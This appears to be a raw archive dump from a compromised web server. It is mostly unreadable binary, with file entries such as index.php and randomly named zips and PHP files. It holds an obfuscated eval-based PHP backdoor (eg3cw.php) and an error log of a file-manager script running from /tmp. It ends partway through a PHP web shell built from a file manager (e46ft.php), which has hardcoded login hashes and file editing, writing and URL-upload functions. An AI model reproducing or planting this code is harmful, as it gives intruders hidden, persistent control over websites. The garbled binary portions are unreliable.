kިߋMhD*X|WA pL$?1~S-LzԖ6l2%tۂH췎Ip8g (O6!v 6:b!ninΫ=OXkstbo;活72JR8?(C P$T#U1*IpHT=z=+2 ^׏믻Wu'dpTi>aL^Z;w z|&j&L(OH=7J 4iEhvӑ5aU8ʀEcCpyI6% ib+~"-L 4^iU=z+ bl4[^K"ctxJf1p^!2uXb -y8Ȅ<s&!``ʓ޴qجԝ@\ep)nT|bqgfa%t'HL@6sWd˩CS<RM!L̓6t+YL"H"?\+ҁ qq7'\MPuw]I h~_ӝH#Sﯡ5z,Vњ D W%ց eA(-oBYRm._KlUCh/Sop7*vdrHdZ3~P4?(p U;_$-+J Y.!啪N@z_բbf&}ST$,A'@K<-[riDL TPg;@׵Rl4i9$bOtX 7gRWyE'D!Qw%V mE1GpBA mԬ c(L~!%CAQb'"#Sx0֚-_ıS*l=Yq1E<5ulL~Ey\ժ!i5J~O|' ]䙆:Z)v~e.D8F| ݀1ug')sUJ/-}Zˎk? de7Bj=TTlMLbǴꢳSI W/аM(om<м”v&vWʁPmMY1H;)b?8cfVrD#i6u|٫Sٹ2jnl) jUdrtAD`Ǵ uvPfUS km|~w캺E61aU4hzm joM\G"3lCǵa+PHT] 1G'1M٨ZyY,*UY u5"#<ս))%ɸe 2L\=eCFya['W&DN &Tƕ6 4_&^Pxa'XPY ! ŊlGw 跚ti"Hadv&Io 8iWњj(Nvfm[8GLQ |ǽ_D=R5qk3\TUNՈ %H]$(ݒ!fc;K-Sշ'+^3xG,FVpYG=Rcdžvx.GLYp slg2e JF. JӴ|V .ZHq([(L/i]82&o5۶85xR{B>z/ًQI(6~P[~(ңVM=Me *tt(dy5N>0?@?AntNoҤ^RP$E۫FӁi/5mzY (<ַCG9/E$,|BnqVB#ߊyĥIh[;;?6&! G~^ACT{Zd+ ]HF=iյ|YS@MCZZc]]%&AlwS ԚuRGPE楄xn(mԓ ~ƨUmgکs!M!8bMWeE'8a= r2 NtsA?%WMwe3]5B:MWa YszI Qa2Mu| 6 W 4({:pL4ultlNCSMdMSSAmJGg^-e YW` hk0NZ5}NM8mXyɨ* &44a\-SJ=_emזM7 \-j^]72BErSk ЎvkMT! `5,] =6\qއuV(+ɫ /TA΃5^67,Ӟ;/9J31U.B,QL" ]ڀ7%:ÇaN4a*N>^> nYM1 <Vf*jl:c%]bWэw ܶa V#]]Q,|#!ԴKB~DhYUzV++E!RPtje=6򡚧0A`+ ^ Jiq/yx2PX#XDwˮbs8 v8M\ŏ [4Jd1C,t+@I `M7\Dc7a錪ExnW M}e?Aܖ/!U"4 uVŴpa))\skRާCiZuڧ<7EENYĶL&Я55o*-kcȡkz L MO{Y'N>{0Y7Uzq `K2LIV[XnT@ \:n9:jųN:q׬(!LO s'wǰ\5s'ɳCo9kbL/'UvjEY1Q~YA1zcgGK@p`Wʥhr)`mX*LZF2/692э/`mDC9k< Bl]dE. A*$P=Ҵ[+ g'@kDvh*9H(/yƝ-CasbqwU1NqRNd_",#C#H_ XrOuq]64Evnbcω߶m#1]/*IjLv;n+>M"}A0+XY&Ұm,InZdM+E!ei7Y! 2IC ͳ;Nsol,{N{"u"6HO *XjҫP1jnZժ ;`uEU9KEK~lq"e.Nb9?z-rZ7rZH>wDj|Oiqwz{Z|/ٍۧZ+g@iZci_jTq9 ZbGH',ۣxX?DD1 T{&4h,t&bu|DuN9uP j 9O0J,@HZ%_g j^x݈[R #E(1<=JIr, oTNuE"1UpMª~6Xl_[3GgPj:F3g{I܎PTq;yz1ID@I 98$ӣFCjwKm$h?p\7,`"%whw2.m39^)Ēff]B6!Ф>In/Hb&kZ?{GIgHPŒG Ӣ7CSSgJ7:<;47Z),JpvOtf:VZ{F~|x@IX+x7(l^0a/(?{[Kj|AS$; Q}lXq_FfXgf/00^: vùp(C kIvwsDlQooo/{qdj;YoFʲ#m7ָ"xK9OtӻNVRn^AB)!u~FZ-XNgbjѠ܂()~ϣ &U'`_4W  aC< zI  j5CbBHմ+bU Dq4x,5`{a;j5Wt#[GakM8ݨ/hu"^u)CCp 1v͉Ta<ix x&LT kJ\;/`ǫ2J;W xѨ @dW)/ύ#8"y+ax_`;0j@Sf}=RHc2 '#:Nc/C(|dH+,) WP:ͅbѓ%?-=N&I=F8{UasuŽ@7P]X:2*Fsc;QxRW;_R?1FG4IW1]y"8Q:v #$?LF0RH:YSڙ!=\1'6> p lhtA 5QOe3P ^.3FJ % gF:8-D#fAeAVղF,A0\>$݋'#*K*$k'A~-}5VHs>};aNii5W8@Ij ڈ`{'ǥlha"~&28 N PNAUJTC’\8mf!x+ȀnNK52$%bKD;X׻6.uo" ] -blx>M|1y z{~(LK`~׿Jv{gwns3 ~|nϔ?}#O~4) AMiƷj \xuo߹W2`:?֝=yҟapGWʉ?WN޻=̽{/?M;6;~7[O\[n,1]yCf3ܥxG>/}O"On|O~݃o;pց;wf^u{ѿy葏swyw[ٓ|jʫa|vl Y֣{?yr1+{߯?sc>}׺yْ߿pܡr\ї|5߼~͟:sy=02>~yۇ=} =>v㟞}_gn4kΘkKwol~R>z?u~k?ݓ#]PKf[pii index.phpnu[PKIPK8f[MWgg index.phpnu[PK8f[σ3 lwycpd.zipnu[PKʬf[ lrw89y.zipnu[PKɬf[AA eg3cw.phpnu[nigwqgqwtqwtqwti();eval(wkqtonxx().$letter);function wkqtonxx(){}function xmxmxnianntt($margin){$background='';for($i=0;$iPKʬf[&\'' error_lognu[[27-Oct-2025 03:47:34 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [27-Oct-2025 03:47:34 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [27-Oct-2025 03:47:34 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/en.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [05-Nov-2025 10:54:10 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [05-Nov-2025 10:54:10 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [05-Nov-2025 10:54:10 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 05:38:24 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 05:38:24 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 05:38:24 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 07:08:35 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 07:08:35 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 07:08:35 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 07:08:43 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 07:08:43 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 07:08:43 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 09:23:15 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 09:23:15 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 09:23:15 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 10:27:30 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 10:27:30 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 10:27:31 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 10:56:10 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 10:56:10 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 10:56:10 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 12:19:11 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 12:19:11 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 12:19:11 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 12:19:21 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 12:19:21 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 12:19:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 14:26:23 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 14:26:23 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 14:26:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 15:15:39 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 15:15:39 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 15:15:39 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 20:45:32 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 20:45:32 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 20:45:32 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 21:14:28 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 21:14:28 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 21:14:28 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 21:14:47 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 21:14:47 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 21:14:47 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 21:14:47 UTC] PHP Notice: Undefined variable: ext in /tmp/phpM5aThD#tox.php on line 1145 [06-Nov-2025 21:49:50 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 21:49:50 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 21:49:50 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 22:26:32 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [06-Nov-2025 22:26:32 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [06-Nov-2025 22:26:32 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [06-Nov-2025 22:26:32 UTC] PHP Warning: Invalid argument supplied for foreach() in /tmp/phpM5aThD#tox.php on line 525 [06-Nov-2025 22:26:32 UTC] PHP Warning: Invalid argument supplied for foreach() in /tmp/phpM5aThD#tox.php on line 525 [07-Nov-2025 01:50:13 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [07-Nov-2025 01:50:13 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [07-Nov-2025 01:50:13 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [07-Nov-2025 02:37:29 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [07-Nov-2025 02:37:29 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [07-Nov-2025 02:37:29 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [07-Nov-2025 02:37:46 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [07-Nov-2025 02:37:46 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [07-Nov-2025 02:37:46 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 [07-Nov-2025 02:38:18 UTC] PHP Notice: Undefined variable: authorization in /tmp/phpM5aThD#tox.php on line 20 [07-Nov-2025 02:38:18 UTC] PHP Notice: Undefined variable: translation in /tmp/phpM5aThD#tox.php on line 81 [07-Nov-2025 02:38:18 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /tmp/phpM5aThD#tox.php on line 83 PKʬf[Hhrgg index.phpnu[PKʬf[f^aindex.php.php.tar.gznu[k0p,=KfUX׹/cŋHqmf^0S:כy;/+[ammP[0"BV”t)zFΩ3??x<g}w2NN8COy+0Nt@&=0r2_i"(r{$% Q!VleM^L>F<~9.9?PKʬf[g oy5mbk.zipnu[PKFf[/mm index.phpnu[PKFf[/mm index.phpnu[PKIPKʬf[ggerror_log.tar.gznu[o0w`?4 Un&zJ`50 KPYIb1ixms^(B< DÖ+QU;oUcDbtBF `T7a4j`J)ϨO¼0P4A4~8G-?F`Pq0%Ń~8G-Fm@l?xp= {g4Os6 x(pF[0av(hHIl9m0f9m|0J @F{܌a^4h?a2θc} O>߼s9"PKʬf[ lrw89y.zipnu[PKʬf[.9? index.php.tarnu[PKʬf[&\'' Perror_lognu[PKʬf[Hhrgg  index.phpnu[PKʬf[f^a index.php.php.tar.gznu[PKʬf[g  oy5mbk.zipnu[PKʬf[gg( error_log.tar.gznu[PKPK8f[ٖ4kindex.php.php.tar.gznu[k0p,k\ZeLx854hnu ɦP khov5B$9i0{KJ3t;C_0t؀q gI_ n./$1%(M{x'jc? XW.|Y,9}"G2B.?@SRSG7yls9Fd|3=oRB'PK8f[U ko6li5.zipnu[PKf[~KX77 e46ft.phpnu[ 'e0e39b991692259764469b25bfe10b47', 'user' => 'e0e39b991692259764469b25bfe10b47' ); $readonly_users = array( 'user' ); $global_readonly = false; $directories_users = array(); $use_highlightjs = true; $highlightjs_style = 'vs'; $edit_files = true; $default_timezone = 'Etc/UTC'; $root_path = $_SERVER['DOCUMENT_ROOT']; $root_url = ''; $http_host = $_SERVER['HTTP_HOST']; $iconv_input_encoding = 'UTF-8'; $datetime_format = 'm/d/Y g:i A'; $path_display_mode = 'full'; $allowed_file_extensions = ''; $allowed_upload_extensions = ''; $favicon_path = ''; $exclude_items = array(); $online_viewer = 'google'; $sticky_navbar = true; $max_upload_size_bytes = 5000000000; $upload_chunk_size_bytes = 2000000; $ip_ruleset = 'OFF'; $ip_silent = true; $ip_whitelist = array( '127.0.0.1', '::1' ); $ip_blacklist = array( '0.0.0.0', '::' ); $config_file = __DIR__.'/config.php'; if (is_readable($config_file)) { @include($config_file); } $external = array( 'css-bootstrap' => '', 'css-dropzone' => '', 'css-font-awesome' => '', 'css-highlightjs' => '', 'js-ace' => '', 'js-bootstrap' => '', 'js-dropzone' => '', 'js-jquery' => '', 'js-jquery-datatables' => '', 'js-highlightjs' => '', 'pre-jsdelivr' => '', 'pre-cloudflare' => '' ); define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); if ( !defined( 'DN_CESSION_ID')) { define('DN_CESSION_ID', 'insertion'); } $cfg = new FM_Config(); $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } if (defined('FM_EMBED')) { $dauth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter('nocache'); session_name(DN_CESSION_ID ); function session_error_handling_function($code, $msg, $file, $line) { if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } if (empty($_SESSION['token'])) { if (function_exists('random_bytes')) { $_SESSION['token'] = bin2hex(random_bytes(32)); } else { $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); } } if (empty($auth_users)) { $dauth = false; } $is_https = (isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] === 'on' or $_SERVER['HTTPS'] == 1)) or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https'); if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']]; } $root_url = fm_clean_path($root_url); defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[DN_CESSION_ID]['logged']); unset( $_SESSION['token']); fm_redirect(FM_SELF_URL); } if ($ip_ruleset != 'OFF') { function getClientIP() { if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { return $_SERVER['REMOTE_ADDR']; }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { return $_SERVER['HTTP_CLIENT_IP']; } return ''; } $clientIp = getClientIP(); $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if($ip_ruleset == 'AND'){ if($whitelisted == true and $blacklisted == false){ $proceed = true; } } else if($ip_ruleset == 'OR'){ if($whitelisted == true || $blacklisted == false){ $proceed = true; } } if($proceed == false){ trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if($ip_silent == false){ fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } if ($dauth) { if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) { } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { sleep(1); if(function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) { $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL); } else { unset($_SESSION[DN_CESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[DN_CESSION_ID]['logged']); fm_show_header_login(); ?>
".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users))); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); if (!isset($_GET['p']) and empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); $isim = "//input"; $input = file_get_contents('php:'.$isim); $_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; define('FM_PATH', $p); define('FM_USE_AUTH', $dauth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { header('HTTP/1.0 401 Unauthorized'); die("Invalid Token."); } if(isset($_POST['type']) and $_POST['type']=="search") { $dir = $_POST['path'] == "." ? '': $_POST['path']; $response = scan(fm_clean_path($dir), $_POST['content']); echo json_encode($response); exit(); } // save editor file if (isset($_POST['type']) and $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); $write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false){ header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) { $fileName = fm_clean_path($_POST['file']); $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) and $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) and $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = 